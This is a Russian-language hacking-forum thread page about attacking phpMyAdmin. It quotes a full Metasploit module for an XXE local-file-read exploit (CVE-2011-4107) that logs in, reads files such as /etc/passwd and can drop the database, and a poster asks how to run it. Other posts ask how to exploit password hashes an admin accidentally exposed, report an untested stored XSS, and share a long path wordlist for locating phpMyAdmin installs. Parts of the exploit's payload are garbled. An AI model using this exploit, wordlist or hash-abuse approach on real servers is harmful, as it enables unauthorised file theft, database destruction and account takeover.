HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 29.05.2012, 22:54
dynda2000
Guest
Сообщений: n/a
Провел на форуме:
2422

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection
Код:
Code:
require 'msf/core'
 
class Metasploit3  'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',
            'Version'     => '1.0',
            'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).
            The attacker must be logged in to MySQL via phpMyAdmin.
            Works on Windows and Linux Versions 3.3.X and 3.4.X},
            'References'  =>
                [
                    [ 'CVE', '2011-4107' ],
                                        [ 'OSVDB', '76798' ],
                                        [ 'BID', '50497' ],
                                        [ 'URL', 'http://secforce.com/research/'],
                ],
            'Author'      => [ 'Marco Batista' ],
            'License'     => MSF_LICENSE
            )
 
        register_options(
            [
                Opt::RPORT(80),
                OptString.new('FILE', [ true,  "File to read", '/etc/passwd']),
                OptString.new('USER', [ true,  "Username", 'root']),
                OptString.new('PASS', [ false,  "Password", 'password']),
                OptString.new('DB', [ true,  "Database to use/create", 'hddaccess']),
                OptString.new('TBL', [ true,  "Table to use/create and read the file to", 'files']),
                OptString.new('APP', [ true,  "Location for phpMyAdmin URL", '/phpmyadmin']),
                OptString.new('DROP', [ true,  "Drop database after reading file?", 'true']),
            ],self.class)
    end
 
    def loginprocess
        # HTTP GET TO GET SESSION VALUES
        getresponse = send_request_cgi({
            'uri'     => datastore['APP']+'/index.php',
            'method'  => 'GET',
            'version' => '1.1',
            }, 25)
 
        if (getresponse.nil?)
            print_error("no response for #{ip}:#{rport}")
        elsif (getresponse.code == 200)
            print_status("Received #{getresponse.code} from #{rhost}:#{rport}")
        elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)
            print_status("Received 302 to #{getresponse.headers['Location']}")
        else
            print_error("Received #{getresponse.code} from #{rhost}:#{rport}")
        end
 
        valuesget = getresponse.headers["Set-Cookie"]
        varsget = valuesget.split(" ")
 
        #GETTING THE VARIABLES NEEDED
        phpMyAdmin = varsget.grep(/phpMyAdmin/).last
        pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last
        # END HTTP GET
 
        # LOGIN POST REQUEST TO GET COOKIE VALUE
        postresponse = send_request_cgi({
            'uri'     => datastore['APP']+'/index.php',
            'method'  => 'POST',
            'version' => '1.1',
            'headers' =>{
                    'Content-Type' => 'application/x-www-form-urlencoded',
                    'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"
                            },
            'data'    => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'
            }, 25)     
 
        if (postresponse["Location"].nil?)
            print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")
            tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last          
        else
            tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last
        end
         
         
        valuespost = postresponse.headers["Set-Cookie"]
        varspost = valuespost.split(" ")
         
        #GETTING THE VARIABLES NEEDED
        pmaUser = varspost.grep(/pmaUser-1/).last
        pmaPass = varspost.grep(/pmaPass-1/).last
 
        return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue
        # END OF LOGIN POST REQUEST
        rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e
            print_error(e.message)
        rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
            print_error(e.message)
    end
 
    def readfile(cookie,tokenvalue)
        #READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN
        getfiles = send_request_cgi({
            'uri'     => datastore['APP']+'/export.php',
            'method'  => 'POST',
            'version' => '1.1',
            'headers' =>{
                    'Cookie' => cookie
                        },
            'data'    => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'
            }, 25)
         
        if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)
            print_error("Error reading the file... not enough privilege? login error?")        
        else
            print_status("#{getfiles.body}")
        end
    end
 
 
    def dropdatabase(cookie,tokenvalue)
        dropdb = send_request_cgi({
            'uri'     => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',
            'method'  => 'GET',
            'version' => '1.1',
            'headers' =>{
                    'Cookie' => cookie
                        },
            }, 25)
 
            print_status("Dropping database: "+datastore['DB'])
    end
 
    def run
        cookie,tokenvalue = loginprocess()
     
        print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")
     
        craftedXML =  "------WebKitFormBoundary3XPL01T\n"
        craftedXML \n"
        craftedXML ]>\n"
        craftedXML \n"
        craftedXML \n"
        craftedXML \n"
        craftedXML \n"
        craftedXML \n"
        craftedXML \n"
        craftedXML \n"
        craftedXML \n"
        craftedXML \n"
        craftedXML &conteudo;\n"
        craftedXML \n"
        craftedXML \n"
        craftedXML \n\n"
        craftedXML  datastore['APP']+'/import.php',
            'method'  => 'POST',
            'version' => '1.1',
            'headers' =>{
                    'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',
                    'Cookie' => cookie
                        },
            'data'    => craftedXML
        }, 25)
 
        readfile(cookie,tokenvalue)
 
        if (datastore['DROP'] == "true")
            dropdatabase(cookie,tokenvalue)
        else
            print_status("Database was not dropped: "+datastore['DB'])         
        end
 
    end
end
http://1337day.com/exploits/17376
P.S. Date: 12-01-2012
Объясни плиз как и чем запускать этот сплоит?
 
Ответить с цитированием

  #32  
Старый 15.07.2012, 16:41
ex'pert
Guest
Сообщений: n/a
Провел на форуме:
6871

Репутация: -3
По умолчанию

Ребят, подскажите что можно сделать с этим

Код:
Code:
go all materials
НА одном из сайтов админ видимо случайно оставил такую ссылку. Что в этих хешах?
 
Ответить с цитированием

  #33  
Старый 15.07.2012, 16:45
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от ex'pert  
ex'pert said:
Ребят, подскажите что можно сделать с этим
Код:
Code:
go all materials
НА одном из сайтов админ видимо случайно оставил такую ссылку. Что в этих хешах?
Да вроде ничего существенного, два мд5 хэша (если не ошибаюсь).
 
Ответить с цитированием

  #34  
Старый 15.07.2012, 20:25
ex'pert
Guest
Сообщений: n/a
Провел на форуме:
6871

Репутация: -3
По умолчанию

Ну я не пойму почему их 2. Может в одном из них пароль к пхпадмину? я знаю адрес входа и логин того узера. Неплохо было бы расшифровать хеши и только знать бы пароль ли в них?

либо авторизоваться как то с помощью 'этих хешей либо кук
 
Ответить с цитированием

  #35  
Старый 13.09.2012, 20:53
MrCepbIu
Познающий
Регистрация: 24.02.2010
Сообщений: 56
Провел на форуме:
98309

Репутация: 0
По умолчанию

[QUOTE="абвгдешка"]
абвгдешка said:
[SIZE="3"]phpMyAdmin
 
Ответить с цитированием

  #36  
Старый 07.11.2012, 08:19
FlooP1k
Guest
Сообщений: n/a
Провел на форуме:
30137

Репутация: 48
По умолчанию

Есть ли еще способы узнать полный путь в phpMyAdmin? Просто все способы указанные в первом посте очень стары и не актуальны ( Хотя бы если есть полные права пользователя?
 
Ответить с цитированием

  #37  
Старый 26.12.2012, 02:44
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

phpmyadmin активная XSS

тест;phpMyAdmin 3.4.*

скрипт; /setup/index.php

путь;index.php?page=servers&mode=edit&id=1

уязвимое поле ;Server hostname;



нашел только что , не проверял есть ли в интернете.
 
Ответить с цитированием

  #38  
Старый 16.06.2015, 08:37
zuzzz
Новичок
Регистрация: 03.07.2009
Сообщений: 11
Провел на форуме:
51296

Репутация: 0
По умолчанию

Недавно делал себе словарик для поиска. Может кому пригодится.

Код:
Code:
/_phpMyAdmin/
/admin/
/admin/mysql/
/admin/phpmyadmin/
/admin/pma/
/db/
/dbadmin/
/myadmin/
/mysql-admin/
/mysql/
/mysqladmin/
/mysqlmanager/
/p/m/a/
/php-my-admin/
/php-myadmin/
/phpm/
/phpmanager/
/phpmy-admin/
/phpmy/
/phpMyA/
/phpmyad-sys/
/phpmyad/
/phpMyAdmin/
/phpMyAdmin-1.1.0/
/phpMyAdmin-1.3.0/
/phpMyAdmin-2.0.5/
/phpMyAdmin-2.1.0/
/phpMyAdmin-2.10.0-rc1/
/phpMyAdmin-2.10.0.1/
/phpMyAdmin-2.10.0.2/
/phpMyAdmin-2.10.0/
/phpMyAdmin-2.10.1-rc1/
/phpMyAdmin-2.10.1/
/phpMyAdmin-2.10.2/
/phpMyAdmin-2.10.3-rc1/
/phpMyAdmin-2.10.3/
/phpMyAdmin-2.11.0-rc2/
/phpMyAdmin-2.11.0/
/phpMyAdmin-2.11.1-rc1/
/phpMyAdmin-2.11.1.1/
/phpMyAdmin-2.11.1.2/
/phpMyAdmin-2.11.1/
/phpMyAdmin-2.11.10.1/
/phpMyAdmin-2.11.10/
/phpMyAdmin-2.11.11-rc1/
/phpMyAdmin-2.11.11.1/
/phpMyAdmin-2.11.11.2/
/phpMyAdmin-2.11.11.3/
/phpMyAdmin-2.11.11/
/phpMyAdmin-2.11.2-rc1/
/phpMyAdmin-2.11.2.1/
/phpMyAdmin-2.11.2.2/
/phpMyAdmin-2.11.2/
/phpMyAdmin-2.11.3-rc1/
/phpMyAdmin-2.11.3/
/phpMyAdmin-2.11.4-rc1/
/phpMyAdmin-2.11.4/
/phpMyAdmin-2.11.5-rc1/
/phpMyAdmin-2.11.5.1/
/phpMyAdmin-2.11.5.2/
/phpMyAdmin-2.11.5/
/phpMyAdmin-2.11.6-rc1/
/phpMyAdmin-2.11.6/
/phpMyAdmin-2.11.7-rc1/
/phpMyAdmin-2.11.7-rc2/
/phpMyAdmin-2.11.7.1/
/phpMyAdmin-2.11.7/
/phpMyAdmin-2.11.8-rc1/
/phpMyAdmin-2.11.8.1/
/phpMyAdmin-2.11.8/
/phpMyAdmin-2.11.9.1/
/phpMyAdmin-2.11.9.2/
/phpMyAdmin-2.11.9.3/
/phpMyAdmin-2.11.9.4/
/phpMyAdmin-2.11.9.5/
/phpMyAdmin-2.11.9.6/
/phpMyAdmin-2.11.9/
/phpMyAdmin-2.2.0/
/phpMyAdmin-2.2.1/
/phpMyAdmin-2.2.2/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.4/
/phpMyAdmin-2.2.5/
/phpMyAdmin-2.2.6/
/phpMyAdmin-2.2.7-pl1/
/phpMyAdmin-2.3.0/
/phpMyAdmin-2.3.1/
/phpMyAdmin-2.3.2/
/phpMyAdmin-2.3.3-pl1/
/phpMyAdmin-2.4.0/
/phpMyAdmin-2.5.0/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.2/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.1-rc1/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2.4/
/phpMyAdmin-2.9.0.1/
/phpMyAdmin-2.9.0.2/
/phpMyAdmin-2.9.0/
/phpMyAdmin-2.9.1.1/
/phpMyAdmin-2.9.2-rc1/
/phpMyAdmin-2.9.2/
/phpMyAdmin-2/
/phpMyAdmin-3.0.0-alpha/
/phpMyAdmin-3.0.0-rc2/
/phpMyAdmin-3.0.0/
/phpMyAdmin-3.0.1-rc1/
/phpMyAdmin-3.0.1.1/
/phpMyAdmin-3.0.1/
/phpMyAdmin-3.1.0-beta1/
/phpMyAdmin-3.1.0-rc1/
/phpMyAdmin-3.1.0/
/phpMyAdmin-3.1.1/
/phpMyAdmin-3.1.2-rc1/
/phpMyAdmin-3.1.2/
/phpMyAdmin-3.1.3-rc1/
/phpMyAdmin-3.1.3.1/
/phpMyAdmin-3.1.3.2/
/phpMyAdmin-3.1.3/
/phpMyAdmin-3.1.4-rc1/
/phpMyAdmin-3.1.4-rc2/
/phpMyAdmin-3.1.4/
/phpMyAdmin-3.1.5-rc1/
/phpMyAdmin-3.1.5/
/phpMyAdmin-3.2.0-beta1/
/phpMyAdmin-3.2.0-rc1/
/phpMyAdmin-3.2.0.1/
/phpMyAdmin-3.2.0/
/phpMyAdmin-3.2.1/
/phpMyAdmin-3.2.2-rc1/
/phpMyAdmin-3.2.2.1/
/phpMyAdmin-3.2.2/
/phpMyAdmin-3.2.3-rc1/
/phpMyAdmin-3.2.3/
/phpMyAdmin-3.2.4-rc1/
/phpMyAdmin-3.2.4/
/phpMyAdmin-3.2.5-rc1/
/phpMyAdmin-3.2.5-rc2/
/phpMyAdmin-3.2.5/
/phpMyAdmin-3.3.0-alpha1/
/phpMyAdmin-3.3.0-beta1/
/phpMyAdmin-3.3.0-rc1/
/phpMyAdmin-3.3.0-rc2/
/phpMyAdmin-3.3.0-rc3/
/phpMyAdmin-3.3.0/
/phpMyAdmin-3.3.1-rc1/
/phpMyAdmin-3.3.1/
/phpMyAdmin-3.3.10-rc1/
/phpMyAdmin-3.3.10.1/
/phpMyAdmin-3.3.10.2/
/phpMyAdmin-3.3.10.3/
/phpMyAdmin-3.3.10.4/
/phpMyAdmin-3.3.10.5/
/phpMyAdmin-3.3.10/
/phpMyAdmin-3.3.2-rc1/
/phpMyAdmin-3.3.2/
/phpMyAdmin-3.3.3-rc1/
/phpMyAdmin-3.3.3/
/phpMyAdmin-3.3.4-rc1/
/phpMyAdmin-3.3.4/
/phpMyAdmin-3.3.5-rc1/
/phpMyAdmin-3.3.5.1/
/phpMyAdmin-3.3.5/
/phpMyAdmin-3.3.6-rc1/
/phpMyAdmin-3.3.6/
/phpMyAdmin-3.3.7-7/
/phpMyAdmin-3.3.7-rc1/
/phpMyAdmin-3.3.7/
/phpMyAdmin-3.3.8-rc1/
/phpMyAdmin-3.3.8.1/
/phpMyAdmin-3.3.8/
/phpMyAdmin-3.3.9-rc1/
/phpMyAdmin-3.3.9.1/
/phpMyAdmin-3.3.9.2/
/phpMyAdmin-3.3.9/
/phpMyAdmin-3.4.0-alpha1/
/phpMyAdmin-3.4.0-alpha2/
/phpMyAdmin-3.4.0-beta1/
/phpMyAdmin-3.4.0-beta2/
/phpMyAdmin-3.4.0-beta3/
/phpMyAdmin-3.4.0-beta4/
/phpMyAdmin-3.4.0-rc1/
/phpMyAdmin-3.4.0-rc2/
/phpMyAdmin-3.4.0/
/phpMyAdmin-3.4.1-rc1/
/phpMyAdmin-3.4.1/
/phpMyAdmin-3.4.10-rc1/
/phpMyAdmin-3.4.10.1/
/phpMyAdmin-3.4.10.2/
/phpMyAdmin-3.4.10/
/phpMyAdmin-3.4.11-rc1/
/phpMyAdmin-3.4.11.1/
/phpMyAdmin-3.4.11/
/phpMyAdmin-3.4.2-rc1/
/phpMyAdmin-3.4.2/
/phpMyAdmin-3.4.3-rc1/
/phpMyAdmin-3.4.3.1/
/phpMyAdmin-3.4.3.2/
/phpMyAdmin-3.4.3/
/phpMyAdmin-3.4.4-rc1/
/phpMyAdmin-3.4.4/
/phpMyAdmin-3.4.5-rc1/
/phpMyAdmin-3.4.5/
/phpMyAdmin-3.4.6-rc1/
/phpMyAdmin-3.4.6/
/phpMyAdmin-3.4.7-rc1/
/phpMyAdmin-3.4.7.1/
/phpMyAdmin-3.4.7/
/phpMyAdmin-3.4.8-rc1/
/phpMyAdmin-3.4.8/
/phpMyAdmin-3.4.9-rc1/
/phpMyAdmin-3.4.9/
/phpMyAdmin-3.5.0-alpha1/
/phpMyAdmin-3.5.0-beta1/
/phpMyAdmin-3.5.0-rc1/
/phpMyAdmin-3.5.0-rc2/
/phpMyAdmin-3.5.0/
/phpMyAdmin-3.5.1-rc1/
/phpMyAdmin-3.5.1/
/phpMyAdmin-3.5.2-rc1/
/phpMyAdmin-3.5.2.1/
/phpMyAdmin-3.5.2.2/
/phpMyAdmin-3.5.2/
/phpMyAdmin-3.5.3-rc1/
/phpMyAdmin-3.5.3/
/phpMyAdmin-3.5.4-rc1/
/phpMyAdmin-3.5.4/
/phpMyAdmin-3.5.5-rc1/
/phpMyAdmin-3.5.5/
/phpMyAdmin-3.5.6-rc1/
/phpMyAdmin-3.5.6/
/phpMyAdmin-3.5.7-rc1/
/phpMyAdmin-3.5.7/
/phpMyAdmin-3.5.8-rc1/
/phpMyAdmin-3.5.8.1/
/phpMyAdmin-3.5.8.2/
/phpMyAdmin-3.5.8/
/phpMyAdmin-3/
/phpMyAdmin-4.0.0-alpha1/
/phpMyAdmin-4.0.0-alpha2/
/phpMyAdmin-4.0.0-beta1/
/phpMyAdmin-4.0.0-beta2/
/phpMyAdmin-4.0.0-rc2/
/phpMyAdmin-4.0.0-rc3/
/phpMyAdmin-4.0.0-rc4/
/phpMyAdmin-4.0.0/
/phpMyAdmin-4.0.1-rc1/
/phpMyAdmin-4.0.1/
/phpMyAdmin-4.0.10.1/
/phpMyAdmin-4.0.10.2/
/phpMyAdmin-4.0.10.3/
/phpMyAdmin-4.0.10.4/
/phpMyAdmin-4.0.10.5/
/phpMyAdmin-4.0.10.6/
/phpMyAdmin-4.0.10.7/
/phpMyAdmin-4.0.10.8/
/phpMyAdmin-4.0.10.9/
/phpMyAdmin-4.0.10/
/phpMyAdmin-4.0.2-rc1/
/phpMyAdmin-4.0.2/
/phpMyAdmin-4.0.3-rc1/
/phpMyAdmin-4.0.3/
/phpMyAdmin-4.0.4-rc1/
/phpMyAdmin-4.0.4.1/
/phpMyAdmin-4.0.4.2/
/phpMyAdmin-4.0.4/
/phpMyAdmin-4.0.5/
/phpMyAdmin-4.0.6/
/phpMyAdmin-4.0.7/
/phpMyAdmin-4.0.8/
/phpMyAdmin-4.0.9/
/phpMyAdmin-4.1.0/
/phpMyAdmin-4.1.1/
/phpMyAdmin-4.1.10/
/phpMyAdmin-4.1.11/
/phpMyAdmin-4.1.12/
/phpMyAdmin-4.1.13/
/phpMyAdmin-4.1.14.1/
/phpMyAdmin-4.1.14.2/
/phpMyAdmin-4.1.14.3/
/phpMyAdmin-4.1.14.4/
/phpMyAdmin-4.1.14.5/
/phpMyAdmin-4.1.14.6/
/phpMyAdmin-4.1.14.7/
/phpMyAdmin-4.1.14.8/
/phpMyAdmin-4.1.14/
/phpMyAdmin-4.1.2/
/phpMyAdmin-4.1.3/
/phpMyAdmin-4.1.4/
/phpMyAdmin-4.1.5/
/phpMyAdmin-4.1.6/
/phpMyAdmin-4.1.7/
/phpMyAdmin-4.1.8/
/phpMyAdmin-4.1.9/
/phpMyAdmin-4.2.0/
/phpMyAdmin-4.2.1/
/phpMyAdmin-4.2.10.1/
/phpMyAdmin-4.2.10/
/phpMyAdmin-4.2.11/
/phpMyAdmin-4.2.12/
/phpMyAdmin-4.2.13.1/
/phpMyAdmin-4.2.13.2/
/phpMyAdmin-4.2.13/
/phpMyAdmin-4.2.2/
/phpMyAdmin-4.2.3/
/phpMyAdmin-4.2.4/
/phpMyAdmin-4.2.5/
/phpMyAdmin-4.2.6/
/phpMyAdmin-4.2.7.1/
/phpMyAdmin-4.2.7/
/phpMyAdmin-4.2.8.1/
/phpMyAdmin-4.2.8/
/phpMyAdmin-4.2.9.1/
/phpMyAdmin-4.2.9/
/phpMyAdmin-4.3.0-alpha1/
/phpMyAdmin-4.3.0-beta1/
/phpMyAdmin-4.3.0-rc1/
/phpMyAdmin-4.3.0-rc2/
/phpMyAdmin-4.3.0/
/phpMyAdmin-4.3.1/
/phpMyAdmin-4.3.10/
/phpMyAdmin-4.3.11.1/
/phpMyAdmin-4.3.11/
/phpMyAdmin-4.3.12/
/phpMyAdmin-4.3.13/
/phpMyAdmin-4.3.2/
/phpMyAdmin-4.3.3/
/phpMyAdmin-4.3.4/
/phpMyAdmin-4.3.5/
/phpMyAdmin-4.3.6/
/phpMyAdmin-4.3.7/
/phpMyAdmin-4.3.8/
/phpMyAdmin-4.3.9/
/phpMyAdmin-4.4.0-alpha1/
/phpMyAdmin-4.4.0-rc1/
/phpMyAdmin-4/
/phpmyadmin-RELEASE_2_10_0/
/phpmyadmin-RELEASE_2_10_0_1/
/phpmyadmin-RELEASE_2_10_0_2/
/phpmyadmin-RELEASE_2_10_0RC1/
/phpmyadmin-RELEASE_2_10_1RC1/
/phpmyadmin-RELEASE_2_10_2/
/phpmyadmin-RELEASE_2_10_3/
/phpmyadmin-RELEASE_2_10_3RC1/
/phpmyadmin-RELEASE_2_11_0/
/phpmyadmin-RELEASE_2_11_0RC2/
/phpmyadmin-RELEASE_2_11_1/
/phpmyadmin-RELEASE_2_11_1_1/
/phpmyadmin-RELEASE_2_11_1_2/
/phpmyadmin-RELEASE_2_11_10/
/phpmyadmin-RELEASE_2_11_10_1/
/phpmyadmin-RELEASE_2_11_11/
/phpmyadmin-RELEASE_2_11_11_1/
/phpmyadmin-RELEASE_2_11_11_2/
/phpmyadmin-RELEASE_2_11_11_3/
/phpmyadmin-RELEASE_2_11_11RC1/
/phpmyadmin-RELEASE_2_11_1RC1/
/phpmyadmin-RELEASE_2_11_2/
/phpmyadmin-RELEASE_2_11_2_1/
/phpmyadmin-RELEASE_2_11_2_2/
/phpmyadmin-RELEASE_2_11_2RC1/
/phpmyadmin-RELEASE_2_11_3/
/phpmyadmin-RELEASE_2_11_3RC1/
/phpmyadmin-RELEASE_2_11_4/
/phpmyadmin-RELEASE_2_11_4RC1/
/phpmyadmin-RELEASE_2_11_5/
/phpmyadmin-RELEASE_2_11_5_1/
/phpmyadmin-RELEASE_2_11_5_2/
/phpmyadmin-RELEASE_2_11_5RC1/
/phpmyadmin-RELEASE_2_11_6/
/phpmyadmin-RELEASE_2_11_6RC1/
/phpmyadmin-RELEASE_2_11_7/
/phpmyadmin-RELEASE_2_11_7_1/
/phpmyadmin-RELEASE_2_11_7RC1/
/phpmyadmin-RELEASE_2_11_7RC2/
/phpmyadmin-RELEASE_2_11_8/
/phpmyadmin-RELEASE_2_11_8_1/
/phpmyadmin-RELEASE_2_11_8RC1/
/phpmyadmin-RELEASE_2_11_9/
/phpmyadmin-RELEASE_2_11_9_1/
/phpmyadmin-RELEASE_2_11_9_2/
/phpmyadmin-RELEASE_2_11_9_3/
/phpmyadmin-RELEASE_2_11_9_4/
/phpmyadmin-RELEASE_2_11_9_5/
/phpmyadmin-RELEASE_2_11_9_6/
/phpmyadmin-RELEASE_2_2_0/
/phpmyadmin-RELEASE_2_2_1/
/phpmyadmin-RELEASE_2_2_2/
/phpmyadmin-RELEASE_2_2_3/
/phpmyadmin-RELEASE_2_2_4/
/phpmyadmin-RELEASE_2_2_5/
/phpmyadmin-RELEASE_2_2_6/
/phpmyadmin-RELEASE_2_2_7PL1/
/phpmyadmin-RELEASE_2_3_0/
/phpmyadmin-RELEASE_2_3_1/
/phpmyadmin-RELEASE_2_3_2/
/phpmyadmin-RELEASE_2_3_3PL1/
/phpmyadmin-RELEASE_2_4_0/
/phpmyadmin-RELEASE_2_5_0/
/phpmyadmin-RELEASE_2_5_1/
/phpmyadmin-RELEASE_2_5_2/
/phpmyadmin-RELEASE_2_5_4/
/phpmyadmin-RELEASE_2_5_5PL1/
/phpmyadmin-RELEASE_2_5_6/
/phpmyadmin-RELEASE_2_6_1PL3/
/phpmyadmin-RELEASE_2_7_0PL2/
/phpmyadmin-RELEASE_2_8_0_4/
/phpmyadmin-RELEASE_2_8_1/
/phpmyadmin-RELEASE_2_8_2_4/
/phpmyadmin-RELEASE_2_9_0/
/phpmyadmin-RELEASE_2_9_0_1/
/phpmyadmin-RELEASE_2_9_0_2/
/phpmyadmin-RELEASE_2_9_1_1/
/phpmyadmin-RELEASE_2_9_2/
/phpmyadmin-RELEASE_2_9_2RC1/
/phpmyadmin-RELEASE_3_0_0/
/phpmyadmin-RELEASE_3_0_0ALPHA/
/phpmyadmin-RELEASE_3_0_0RC2/
/phpmyadmin-RELEASE_3_0_1/
/phpmyadmin-RELEASE_3_0_1_1/
/phpmyadmin-RELEASE_3_0_1RC1/
/phpmyadmin-RELEASE_3_1_0/
/phpmyadmin-RELEASE_3_1_0BETA1/
/phpmyadmin-RELEASE_3_1_0RC1/
/phpmyadmin-RELEASE_3_1_1/
/phpmyadmin-RELEASE_3_1_2/
/phpmyadmin-RELEASE_3_1_2RC1/
/phpmyadmin-RELEASE_3_1_3/
/phpmyadmin-RELEASE_3_1_3_1/
/phpmyadmin-RELEASE_3_1_3_2/
/phpmyadmin-RELEASE_3_1_3RC1/
/phpmyadmin-RELEASE_3_1_4/
/phpmyadmin-RELEASE_3_1_4RC1/
/phpmyadmin-RELEASE_3_1_4RC2/
/phpmyadmin-RELEASE_3_1_5/
/phpmyadmin-RELEASE_3_1_5RC1/
/phpmyadmin-RELEASE_3_2_0/
/phpmyadmin-RELEASE_3_2_0_1/
/phpmyadmin-RELEASE_3_2_0BETA1/
/phpmyadmin-RELEASE_3_2_0RC1/
/phpmyadmin-RELEASE_3_2_2/
/phpmyadmin-RELEASE_3_2_2_1/
/phpmyadmin-RELEASE_3_2_2RC1/
/phpmyadmin-RELEASE_3_2_3/
/phpmyadmin-RELEASE_3_2_3RC1/
/phpmyadmin-RELEASE_3_2_4/
/phpmyadmin-RELEASE_3_2_4RC1/
/phpmyadmin-RELEASE_3_2_5/
/phpmyadmin-RELEASE_3_2_5RC1/
/phpmyadmin-RELEASE_3_2_5RC2/
/phpmyadmin-RELEASE_3_3_0/
/phpmyadmin-RELEASE_3_3_0ALPHA1/
/phpmyadmin-RELEASE_3_3_0BETA1/
/phpmyadmin-RELEASE_3_3_0RC1/
/phpmyadmin-RELEASE_3_3_0RC2/
/phpmyadmin-RELEASE_3_3_0RC3/
/phpmyadmin-RELEASE_3_3_1/
/phpmyadmin-RELEASE_3_3_10/
/phpmyadmin-RELEASE_3_3_10_1/
/phpmyadmin-RELEASE_3_3_10_2/
/phpmyadmin-RELEASE_3_3_10_3/
/phpmyadmin-RELEASE_3_3_10_4/
/phpmyadmin-RELEASE_3_3_10_5/
/phpmyadmin-RELEASE_3_3_10RC1/
/phpmyadmin-RELEASE_3_3_1RC1/
/phpmyadmin-RELEASE_3_3_2/
/phpmyadmin-RELEASE_3_3_2RC1/
/phpmyadmin-RELEASE_3_3_3/
/phpmyadmin-RELEASE_3_3_3RC1/
/phpmyadmin-RELEASE_3_3_4/
/phpmyadmin-RELEASE_3_3_4RC1/
/phpmyadmin-RELEASE_3_3_5/
/phpmyadmin-RELEASE_3_3_5_1/
/phpmyadmin-RELEASE_3_3_5RC1/
/phpmyadmin-RELEASE_3_3_6/
/phpmyadmin-RELEASE_3_3_6RC1/
/phpmyadmin-RELEASE_3_3_7/
/phpmyadmin-RELEASE_3_3_7RC1/
/phpmyadmin-RELEASE_3_3_8/
